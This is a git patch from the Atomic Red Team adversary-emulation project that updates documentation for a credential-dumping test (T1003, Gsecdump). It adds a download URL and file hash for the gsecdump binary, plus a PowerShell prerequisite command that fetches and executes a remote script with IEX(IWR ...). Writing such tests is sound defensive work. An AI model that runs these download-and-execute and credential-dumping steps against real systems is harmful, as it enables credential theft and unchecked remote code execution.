From 31f946622daaa0e07b2b1b0c564ab4e6fe333314 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Sat, 7 Mar 2020 22:20:30 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1003/T1003.md | 10 ++++++++-- atomics/index.yaml | 18 +++++++++++++++--- 2 files changed, 23 insertions(+), 5 deletions(-) diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index fcd28e63..5fdbb4b4 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -201,6 +201,8 @@ Dump credentials from memory using Gsecdump | Name | Description | Type | Default Value | |------|-------------|------|---------------| | gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe| +| gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe| +| gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) @@ -211,14 +213,18 @@ Dump credentials from memory using Gsecdump #### Dependencies: Run with `powershell`! -##### Description: Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe}) +##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe}) ##### Check Prereq Commands: ``` if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ``` -Write-Host Automated installer not implemented yet +$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" +IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1") +if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){ + Move-Item $binpath "#{gsecdump_exe}" +} ``` diff --git a/atomics/index.yaml b/atomics/index.yaml index b2a0176c..98931d6d 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -19486,12 +19486,24 @@ credential-access: description: Path to the Gsecdump executable type: Path default: PathToAtomicsFolder\T1003\bin\gsecdump.exe + gsecdump_url: + description: Path to download Gsecdump binary file + type: url + default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe + gsecdump_bin_hash: + description: File hash of the Gsecdump binary file + type: String + default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC dependency_executor_name: powershell dependencies: - - description: Windows Credential Editor must exist on disk at specified location - (#{gsecdump_exe}) + - description: Gsecdump must exist on disk at specified location (#{gsecdump_exe}) prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}' - get_prereq_command: Write-Host Automated installer not implemented yet + get_prereq_command: |- + $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" + IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1") + if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){ + Move-Item $binpath "#{gsecdump_exe}" + } executor: name: command_prompt elevation_required: true